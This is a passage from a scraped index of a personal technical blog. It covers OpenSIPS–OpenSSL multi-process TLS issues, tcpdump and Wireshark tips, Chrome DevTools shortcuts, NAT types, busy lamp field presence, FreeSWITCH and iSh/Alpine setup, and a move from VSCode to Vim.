interconnections will always see a single TLS connection towards your server. However, ensuring mutual access to the connection is not that trivial, as you will see throughout this article. Nevertheless, since in OpenSIPS we need to address both scalability and ease of interconnection with other SIP endpoints, we decided to implement solution number 3.\nInitial Implementation Although even back then it was advertised as a multi-threaded library, OpenSSL was exposing hooks to use it in a multi-process environment:\nCRYPTO_set_mem_functions() hook could be used to have the library use a custom memory allocator. 
We set this function to make sure OpenSSL allocates the SSL context in shared memory, so that it can be accessed by any process CRYPTO_set_id_callback() was used to determine the thread that OpenSSL was running in. We used this callback to indicate that the “thread” was actually a process, and each of them has its own id, namely the Process ID (PID) CRYPTO_set_locking_callback() was exposing hooks to perform create, lock, unlock and delete using “user” specified locking mechanisms. Using this function we were able to “guard” the SSL shared context (allocated in our shared memory) using OpenSIPS-specific multi-process shared locking mechanisms. That being said, we had all the ingredients to implement our chosen solution using OpenSSL; all we had to do was to glue them together. This is how the first implementation of SSL/TLS communication appeared in OpenSIPS. And it worked out just great throughout the years, up to and including OpenSSL version 1.0.2.\nOpenSSL 1.1.0 new threading API The turning point On the 25th of August 2016, when OpenSSL 1.1.0 was released, the OpenSSL team decided to implement a new threading API. In order to provide a nicer usage experience to multi-threaded applications that were using the OpenSSL libraries, they dropped the previously used threading mechanism and replaced it with their own (hardcoded) implementation using pthreads (for Linux). This means that we could no longer use the CRYPTO_set_locking_callback() hooks, as they became obsolete. Since we were still allocating SSL contexts in shared memory, the locking mechanisms (i.e. pthread mutex structures) were also allocated in shared memory. 
Therefore, when OpenSSL was using them to guard the shared context, it was actually still using a “shared” memory, therefore the other processes were able to see that the lock/pthread mutex is acquired, resulting (in theory) in a successful mutual exclusion to the shared context.\nThe issue In practice, however, this resulted in a deadlock (see tickets #1590, #1755, #1767). Although in general it was working fine, a problem appeared when there was contention trying to acquire the pthread mutex from two different processes at the same time. Imagine process P1 and P2 trying to acquire mutex M in parallel: P1 gets there first and acquires M; P2 then tries to acquire it – because M is in shared memory, it detects that M is already acquired (by P1), thus it blocks waiting for it to be released. When P1 finishes the processing, it releases M. However, due to the fact that pthreads by default is not meant to be shared between processes, P2 is not informed that M was released, thus remaining stuck. This was a problem very hard to debug, because when a process gets stuck, the first thing to do is to run a trap (opensipsctl trap) and check which process is blocked. However, when running trap, gdb is executed on each OpenSIPS process, so each process is “interrupted” to do a GDB dump. Therefore our trap command would actually awaken P2, make it re-evaluate the status of M, basically unblocking the process and “fixing” the “deadlock”.\nThe solution Luckily, after a lot of tests and brainstorming, we managed to pinpoint the issue. The fix was quite simple – all we had to do was to set the PTHREAD_PROCESS_SHARED attribute on the pthread shared mutex. However, these mutexes are encapsulated in the openssl library, and there are no hooks to tune them. After trying to pick some brains from the OpenSSL team, we realized that they are not interested in supporting that, therefore we had to take this issue into our own hands. 
That’s when we used a trick to overload pthread_mutex_init() and pthread_rwlock_init() with our own implementations, which also set the shared attribute. And our SSL/TLS implementation started to work again.\nOpenSSL 1.1.1 new challenges New crashes With the OpenSSL 1.1.1 release on the 11th of September 2018, new issues started to appear. Due to the fact that the OpenSSL team was trying to make their code base even more thread friendly (without considering the effects on multi-process applications), they started to move most of their internal objects into TLS (thread local storage) memory zones. Although OpenSIPS was still allocating OpenSSL contexts in shared memory, these were stored in some locations where only one thread has access. Mixing the two memory management mechanisms resulted in several unexpected crashes in the SSL library (see ticket #1799).\nFixing attempts After reading the OpenSSL library code and understanding the problem, our first idea was to implement a thread local storage that was compatible with multiple processes. This was our first attempt to fix the issue: overwrite the pthread_key_create(), pthread_getspecific() and pthread_setspecific() functions, similarly to the solution we had for the OpenSSL 1.1.0 issues, to make them multi-process aware. Unfortunately our solution failed for two reasons: although the library was no longer crashing, hence the memory operations were now valid, most of the concurrent connections were rejected (only 2 out of 10 SSL accepts were passing through). So this indicated to us that there were still some issues with the internal data – although it is now accessible, most likely there is no properly synchronized concurrent access to it, resulting in unexpected behavior. A second issue with this approach was that overwriting the thread local storage implementation was not only done for the OpenSSL library, but for all the other libraries that were used by OpenSIPS. 
And since those libraries most likely do not use OpenSIPS-managed memory, this might introduce bugs in other libraries – therefore we had to drop this solution. The second attempt to fix this issue came from inspecting the stack trace of the crashes, combined with vitalikvoip’s suggestion, which indicated that the problem was within the pseudo-random number generator (RAND_DRBG_bytes()). Therefore we proceeded by using the RAND_set_rand_method() hooks to guard the random number generation process. Although this stopped the crashes, connections were still not properly accepted (again, 8 out of 10 were rejected), so we were back to square one.\nFinal fix Since the problem was not sorted out, we started to dig more into OpenSSL thread safety considerations and discussions (see OpenSSL ticket #2165), and tried to understand how these translate to process safety. This made us wonder if it is OK to have an SSL_CTX (the context that manages what certificates, ciphers and other settings are to be used for new connections) shared among all processes. Therefore our next attempt to fix this issue was to duplicate the context (not the connection context, but the global context of SSL) in each process, and use each process’ context to create new connections. And voilà, OpenSIPS started to accept all the connections, without any issues! After running a set of tests, both by us and our community, we concluded that the issue was the fact that the global SSL context was shared among OpenSIPS processes. Unfortunately this was not a diagnosis that we could have come up with easily, due to the fact that this was working just fine up until version 1.1.1, and there were no indications in the OpenSSL documentation that this behavior had changed. Hence, the long-term process of solving this issue.\nConclusions As described throughout the article, running OpenSSL in a multi-process environment, with a context that is shared among multiple processes, is definitely doable. 
However, without support from the library itself (such as offering locking and memory allocation hooks and providing exhaustive documentation), it becomes more and more complicated to maintain the current implementation. That’s why in the future we are planning to look into different alternatives for TLS (i.e. more multi-process friendly libraries). But until then, you can use OpenSIPS with the latest OpenSSL TLS implementation without any issues! Many thanks to vitalikvoip and danpascu for their valuable input on the latest matters, as well as to the whole OpenSIPS core team for all the brainstorming sessions for these issues (and not only :)). Although they were not easy to solve, it was definitely a lot of fun dealing with them. If you want to find out more information regarding this topic (and not only), make sure you do not miss this year’s OpenSIPS Summit on 5th-8th May 2020, in Amsterdam, Netherlands.\n","permalink":"https://wdd.js.org/opensips/blog/openssl-opensips/","summary":"In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and widely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task.","title":"The OpenSIPS and OpenSSL journey"},{"content":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). 
add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc\n","permalink":"https://wdd.js.org/posts/2020/12/setting-locale-failed/","summary":"perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), LC_CTYPE = \u0026#34;UTF-8\u0026#34;, LANG = \u0026#34;en_US.UTF-8\u0026#34; are supported and installed on your system. perl: warning: Falling back to the standard locale (\u0026#34;C\u0026#34;). add in .bashrc\nexport LANG=en_US.UTF-8 export LANGUAGE=en_US.UTF-8 export LC_COLLATE=C export LC_CTYPE=en_US.UTF-8 source ~/.bashrc","title":"perl: warning: Setting locale failed."},{"content":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面\n","permalink":"https://wdd.js.org/posts/2020/12/yor2t9/","summary":"使用触摸板,可以左右滑动,来左右滚动只能部分显示的页面。但是在用鼠标的时候,由于鼠标滚轮只能上下滚动页面,所以不太方便。\n此时,你可以按住shift + 滚动鼠标滚轮,来实现左右滚动页面","title":"Get: shift + 鼠标滚轮 左右滚动页面"},{"content":"ethereal-tcpdump.pdf\n","permalink":"https://wdd.js.org/network/hhlfi1/","summary":"ethereal-tcpdump.pdf","title":"tcpdump filters"},{"content":"libpcap-tutorial.pdf\n","permalink":"https://wdd.js.org/network/ivzphz/","summary":"libpcap-tutorial.pdf","title":"libpcap tutorial"},{"content":"tcpdump-zine.pdf\n","permalink":"https://wdd.js.org/network/yscigi/","summary":"tcpdump-zine.pdf","title":"tcpdump zine"},{"content":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 http://www.tcpdump.org/pcap.html ","permalink":"https://wdd.js.org/network/uq5cii/","summary":"准备条件 有gcc编译器 安装libpcap包 1.c 试运行 #include \u0026lt;stdio.h\u0026gt; #include 
\u0026lt;pcap.h\u0026gt; int main(int argc, char *argv[]) { char *dev = argv[1]; printf(\u0026#34;Device: %s\\n\u0026#34;, dev); return(0); } gcc ./1.c -o 1.exe -lpcap demo-libpcap git:(master) ✗ ./1.exe eth0 Device: eth0 第一个栗子非常简单,仅仅是测试相关的库是否加载正确\n2.c 获取默认网卡名称 参考 http://www.tcpdump.org/pcap.html ","title":"pcap抓包教程"},{"content":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。\n","permalink":"https://wdd.js.org/network/zgftde/","summary":"使用tcpdump在服务端抓包,将抓包后的文件在wireshark中打开。\n然后选择:Telephony - VoIP Calls,wireshark可以从抓包文件中提取出SIP呼叫列表。\n呼叫列表页面 在呼叫列表页面,选择一条呼叫记录,点击Flow Sequence, 可以查看该呼叫的SIP时序图。点击Play Stream, 可以播放该条呼叫的声音。\nRTPplay页面有播放按钮,点击播放可以听到通话声音。","title":"wireshark从pcap中提取语音文件"},{"content":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 https://blog.csdn.net/qq_19004627/article/details/82287172 ","permalink":"https://wdd.js.org/network/kgrco2/","summary":"tcpdump可以在抓包时,按照指定时间间隔或者按照指定的包大小,产生新的pcap文件。用wireshark分析这些包时,往往需要将这些包做合并或者分离操作。\nmergecap 如果安装了Wireshark那么mergecap就会自动安装,可以使用它来合并多个pcap文件。\n// 按照数据包中的时间顺序合并文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap // 按照命令行中的输入数据包文件顺序合并文件 // 不加-a, 可能会导致SIP时序图重复的问题 mergecap -a -w output.pcap input1.pcap input2.pcap input3.pcap editcap 对于一个很大的pcap文件,按照时间范围分割出新的pcap包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 参考 
https://blog.csdn.net/qq_19004627/article/details/82287172 ","title":"wireshark合并和按时间截取pcap文件"},{"content":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:\n全局快捷键 Windows Mac 显示一般设置对话框 ?、F1 ? 光标定位到地址栏 Ctrl + L Cmd + L 下一个面板 Ctrl + ] Cmd + ] 上一个面板 Ctrl + [ Cmd + [ 在面板历史记录中后退 Ctrl + Alt + [ Cmd + Opt + [ 在面板历史记录中前进 Ctrl + Alt + ] Cmd + Opt + ] 更改停靠位置 Ctrl + Shift + D Cmd + Shift + D 打开 Device Mode Ctrl + Shift + M Cmd + Shift + M 切换控制台/在设置对话框打开时将其关闭 Esc Esc 刷新页面 F5、Ctrl + R Cmd + R 刷新忽略缓存内容的页面 Ctrl + F5、Ctrl + Shift + R Cmd + Shift + R 在当前文件或面板中搜索文本 Ctrl + F Cmd + F 在所有源中搜索文本 Ctrl + Shift + F Cmd + Opt + F 按文件名搜索(除了在 Timeline 上) Ctrl + O、Ctrl + P Cmd + O、Cmd + P 放大(焦点在 DevTools 中时) Ctrl + + Cmd + Shift + + 缩小 Ctrl + - Cmd + Shift + - 恢复默认文本大小 Ctrl + 0 Cmd + 0 按面板分类的键盘快捷键 Elements Elements 面板 Windows Mac 撤消更改 Ctrl + Z Cmd + Z 重做更改 Ctrl + Y Cmd + Y、Cmd + Shift + Z 导航 向上键、向下键 向上键、向下键 展开/折叠节点 向右键、向左键 向右键、向左键 展开节点 点击箭头 点击箭头 展开/折叠节点及其所有子节点 Ctrl + Alt + 点击箭头图标 Opt + 点击箭头图标 编辑属性 Enter、双击属性 Enter、双击属性 隐藏元素 H H 切换为以 HTML 形式编辑 F2 Styles 边栏 Styles 边栏中可用的快捷键:\nStyles 边栏 Windows Mac 编辑规则 点击 点击 插入新属性 点击空格 点击空格 转到源中样式规则属性声明行 Ctrl + 点击属性 Cmd + 点击属性 转到源中属性值声明行 Ctrl + 点击属性值 Cmd + 点击属性值 在颜色定义值之间循环 Shift + 点击颜色选取器框 Shift + 点击颜色选取器框 编辑下一个/上一个属性 Tab、Shift + Tab Tab、Shift + Tab 增大/减小值 向上键、向下键 向上键、向下键 以 10 为增量增大/减小值 Shift + Up、Shift + Down Shift + Up、Shift + Down 以 10 为增量增大/减小值 PgUp、PgDown PgUp、PgDown 以 100 为增量增大/减小值 Shift + PgUp、Shift + PgDown Shift + PgUp、Shift + PgDown 以 0.1 为增量增大/减小值 Alt + 向上键、Alt + 向下键 Opt + 向上键、Opt + 向下键 Sources Sources 面板 Windows Mac 暂停/继续脚本执行 F8、Ctrl + \\ F8、Cmd + \\ 越过下一个函数调用 F10、Ctrl + ' F10、Cmd + ' 
进入下一个函数调用 F11、Ctrl + ; F11、Cmd + ; 跳出当前函数 Shift + F11、Ctrl + Shift + ; Shift + F11、Cmd + Shift + ; 选择下一个调用框架 Ctrl + . Opt + . 选择上一个调用框架 Ctrl + , Opt + , 切换断点条件 点击行号、Ctrl + B 点击行号、Cmd + B 编辑断点条件 右键点击行号 右键点击行号 删除各个单词 Ctrl + Delete Opt + Delete 为某一行或选定文本添加注释 Ctrl + / Cmd + / 将更改保存到本地修改 Ctrl + S Cmd + S 保存所有更改 Ctrl + Alt + S Cmd + Opt + S 转到行 Ctrl + G Ctrl + G 按文件名搜索 Ctrl + O Cmd + O 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 转到成员 Ctrl + Shift + O Cmd + Shift + O 关闭活动标签 Alt + W Opt + W 运行代码段 Ctrl + Enter Cmd + Enter 在代码编辑器内 代码编辑器 Windows Mac 转到匹配的括号 Ctrl + M 跳转到行号 Ctrl + P + 数字 Cmd + P + 数字 跳转到列 Ctrl + O + 数字 + 数字 Cmd + O + 数字 + 数字 切换注释 Ctrl + / Cmd + / 选择下一个实例 Ctrl + D Cmd + D 撤消上一个选择 Ctrl + U Cmd + U Timeline Timeline 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 保存时间线数据 Ctrl + S Cmd + S 加载时间线数据 Ctrl + O Cmd + O Profiles Profiles 面板 Windows Mac 开始/停止记录 Ctrl + E Cmd + E 控制台 控制台快捷键 Windows Mac 接受建议 向右键 向右键 上一个命令/行 向上键 向上键 下一个命令/行 向下键 向下键 聚焦到控制台 Ctrl + ` Ctrl + ` 清除控制台 Ctrl + L Cmd + K、Opt + L 多行输入 Shift + Enter Ctrl + Return 执行 Enter Return Device Mode Device Mode 快捷键 Windows Mac 双指张合放大和缩小 Shift + 滚动 Shift + 滚动 抓屏时 抓屏快捷键 Windows Mac 双指张合放大和缩小 Alt + 滚动、Ctrl + 点击并用两个手指拖动 Opt + 滚动、Cmd + 点击并用两个手指拖动 检查元素工具 Ctrl + Shift + C Cmd + Shift + C ","permalink":"https://wdd.js.org/posts/2020/11/muk33s/","summary":"本页介绍 Chrome DevTools 中所有键盘快捷键的参考信息。一些快捷键全局可用,而其他快捷键会特定于单一面板。您也可以在提示中找到快捷键。将鼠标悬停在 DevTools 的 UI 元素上可以显示元素的提示。 如果元素有快捷键,提示将包含快捷键。\n访问 DevTools 访问 DevTools 在 Windows 上 在 Mac 上 打开 Developer Tools F12、Ctrl + Shift + I Cmd + Opt + I 打开/切换检查元素模式和浏览器窗口 Ctrl + Shift + C Cmd + Shift + C 打开 Developer Tools 并聚焦到控制台 Ctrl + Shift + J Cmd + Opt + J 检查检查器(取消停靠第一个后按) Ctrl + Shift + I Cmd + Opt + I 全局键盘快捷键 下列键盘快捷键可以在所有 DevTools 面板中使用:","title":"Chrome 键盘快捷键参考"},{"content":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the 
availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.\n","permalink":"https://wdd.js.org/posts/2020/11/ig536h/","summary":"when considered in conjunction with deployment architectures that include 1:M and M:N combinations of Application Servers and Media Servers\nMedia Resource Broker (MRB) entity, which manages the availability of Media Servers and the media resource demands of Application Servers. The document includes potential deployment options for an MRB and appropriate interfaces to Application Servers and Media Servers.","title":"RFC 6917 笔记"},{"content":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play\n","permalink":"https://wdd.js.org/posts/2020/11/nh68ws/","summary":"4种NAT类型 NAT类型 接收数据前是否要先发送数据 有没有可能检测下一个IP:PORT对是否打开 是否限制发包目的的IP:PORT 全锥型 no yes no 限制锥型 yes yes only IP 端口限制型 yes yes yes 对称型 yes no yes NAT穿透 • STUN: Simple traversal of UDP over NAT• TURN: Traversal of UDP over Relay NAT• ALG: Application Layer Gateways• MANUAL: Manual configuration (port forwarding)• UPNP: Universal Plug and Play","title":"NAT"},{"content":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. 
Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.\nBusy Lamp Field Overview Maybe this analogy will help: You’re in New York City, and you need to flag down a yellow cab. (Let’s pretend Uber isn’t a thing for a minute.) The cabs with their roof light on are available. The cabs with their light off are occupied. If the cab’s roof light is lit up—but not the number, just the words “off duty”—they’re unavailable. Make sense? BLF is much the same, just for office phones: a light indication of who’s available to talk, who’s on the phone, and who’s “off duty” for the moment. If you’re familiar with the term “presence,” BLF is the same thing, just specific to phone extensions. So why do you want these flashing lights in your line of sight? They allow you to monitor your coworkers in real time during the workday. Now, before you go all 1984 on us, let us clarify how this isn’t a Big Brother type of monitoring: BLF is a vital tool for anyone whose job relies on phone calls—think sales, reception, or support. Imagine having to physically check if someone was available for a call. Besides being a wildly inefficient way to spend your day, it also means the caller is left hanging on hold for however long it takes you to find your coworker. And what do you do if the coworker in question is in a different office, in a different state, or even in a different country? An active busy lamp field eliminates this problem altogether. Busy lamp field lets you know who’s available for a call transfer with a single glance. So how does this work in an actual office setting? Take Michael in Sales, for example. He’s on the phone with a customer who has a very specific question that’s best answered by Malcolm. Michael can glance at his OnSIP app screen and immediately see if Malcolm is available, on a call, or logged out at that exact moment. If available, Michael can immediately transfer the customer over to Malcolm. 
If unavailable, Michael can take a message, send the customer to Malcolm’s voicemail, or suggest another agent who is available.\nBusy Lamp Field on Desk Phones: BLF Keys Whether your main desk phone knowledge comes from reruns of The Office or you use one every day, you’ve undoubtedly seen tiny lights blinking on a panel of side buttons. While each phone is unique in its setup, nearly all desk phones have these buttons—BLF keys—to the side of a small screen that you can connect to various extensions. It’s up to you which extensions you configure on your phone—other lines of your own, the coworkers you call the most, people to whom you tend to transfer phone calls, or even your boss. The BLF keys will show different colors, regularly green and red or orange, based on which extensions are currently in use so that you always have an overview of who’s available. If you’d like to set up BLF on your desk phone, our Knowledgebase will help you configure the OnSIP specifics. Each phone has its own guide to colors, flashing status, and configuration, so follow the instructions provided by your particular phone model. BLF keys light up red to indicate a line is in use.\nBusy Lamp Field in the OnSIP Softphone App: BLF Presence The OnSIP app takes a desk phone’s busy lamp field and upgrades it for our current technological norms. Most of us here at OnSIP use our desktop app rather than physical phones. Because we have a contacts panel on the left side of the app, presence is automatically shown for everyone. As an added bonus, the apps also show you how long someone’s been on a call. Here’s how busy lamp field appears in the OnSIP app:\nGreen: Available Orange: Away Cerise: Busy Desk phones have a limited number of BLF keys to configure, so you have to pick and choose which colleagues will be visible to you or constantly switch it around based on daily needs. 
With the OnSIP softphone, everyone is visible in a single glance. To give you an idea of how they differ, here’s a comparison view of BLF as it appears in the app and on a desk phone: How BLF Affects Real-Time Communications WebRTC is a huge part of telecom innovations right now, and OnSIP is no exception. We’ve launched sayso, a web-based calling solution that lets your site visitors call or video chat straight from any webpage. It’s a fantastic business tool, but we’ll let you read about that elsewhere—this post is all about busy lamp field, after all. Real-time communication is a wonderful thing, and it wouldn’t be quite as functional without busy lamp field. If sayso couldn’t tell which agents were available to chat, how would it function? Exactly. (We assumed you answered, “It wouldn’t” in your head.) We mentioned above how BLF is simply a phone-specific type of presence—it tells you that a phone is plugged in and can take a call—and certainly the most common form of the feature. Presence factors into how sayso works but with a few key differences. Typical BLF isn’t quite advanced enough for sayso—it requires a more enhanced form of presence. We designed our proprietary presence system to take the typical BLF “available” status to the next level and instead say, “Yes, this person is sitting at their phone at this exact moment and is ready to take your call.” Presence is an essential part of sayso. Busy lamp field is an integral part of the workday for anyone who needs to call a coworker or whose job description heavily features the word “call.” Whether you prefer a desktop interface or a physical handset balanced against your ear, you should be able to glance at your phone of choice and see which coworkers are available at any time. 
The name might be a mouthful, but that’s probably why it’s just a visual cue anyway.\n参考资料 https://www.onsip.com/voip-resources/voip-fundamentals/what-is-a-busy-lamp-field-blf-and-why-do-you-need-it PDF附件 GXV32xx_broadworks_BLF_Guide.pdf 1501643005322.pdf Quick_Setup_BLF_List_on_Yealink_IP_Phones_with_BroadSoft_UC_ONE_v1.0.pdf ","permalink":"https://wdd.js.org/opensips/ch9/blf/","summary":"What Is a Busy Lamp Field (BLF) and Why Do You Need It? Busy lamp field is a presence indicator that allows you to see who in your organization is available (or not) for a phone call at any given time.\nThe term “busy lamp field” sounds a bit more involved than it really is. Put simply, it just means the ability to see who in your organization is available or not for a phone call at any given time.","title":"BLF指示灯"},{"content":"1. 将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 ./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html\n","permalink":"https://wdd.js.org/posts/2020/11/gtrrng/","summary":"1. 
将源码包上传到服务器, 并解压 安装依赖 apt update apt install autoconf \\ libtool \\ libtool-bin \\ libjpeg-dev \\ libsqlite3-dev \\ libspeex-dev libspeexdsp-dev \\ libldns-dev \\ libedit-dev \\ libtiff-dev \\ libavformat-dev libswscale-dev libsndfile-dev \\ liblua5.1-0-dev libcurl4-openssl-dev libpcre3-dev libopus-dev libpq-dev 配置 ./bootstrap.sh ./configure make make \u0026amp;\u0026amp; make install 参考:https://www.cnblogs.com/MikeZhang/p/RaspberryPiInstallFreeSwitch.html","title":"树莓派安装fs 1.10"},{"content":"为了能够在所有环境达到一致且极致的编程体验。我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发工具,用了一段时间后,我发现开发速度相比于vscode上很慢。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。\n","permalink":"https://wdd.js.org/vim/from-vscode-to-vim/","summary":"为了能够在所有环境达到一致且极致的编程体验。我已经准备了好长的时间,从vscode切换到vim上做开发。\n我的切换计划分为多个阶段:\n尝试:使用vim编辑单个文件 练习:在vscode上安装vim插件,用了一段时间,感觉很别扭。 徘徊:尝试使用vim作为开发工具,用了一段时间后,我发现开发速度相比于vscode上很慢。特别是多文件编辑,文件创建。没有vscode编辑器的那种文件侧边栏,感觉写代码不太真实,云里雾里的感觉。然后我就又切换到vscode上开发。 精进:我一直认为我vim已经学的差不多了,但是用vim的时候,总是感觉使不上劲。我觉得我没有系统的学习vim。然后我就去找了vim方面的书籍《vim实用技巧》。这本书我看过第一遍,我觉得自己之前对vim的理解太过肤浅。然后我就找机会从书中学习的技巧练习写代码。这本书我看了不下于三遍,每次看都有收获。每每遇到困惑的地方,我就会随手去查查。然后做总结。 切换:从今年双十一,我开始使用vim做开发,直到今天,我一直都没有使用vscode, 并且我也把vscode卸载了。我之所以敢于卸载vscode, 是因为我觉得我在vim上开发的效率,已经高于vscode。 熟练运用vim之后,我发现在vim上切换文件,打开文件还是创建文件,速度非常快,完全不需要鼠标点击。\n除了没有右边的代码预览视图,vim功能都有。而且我越用越觉得vim的netrw插件要比vscode左边栏的文件树窗口好用。\n还有代码搜索,我使用了ack, 用这个命令搜索关键词,简直快的飞起。","title":"从VSCode切换到VIM"},{"content":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 
可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 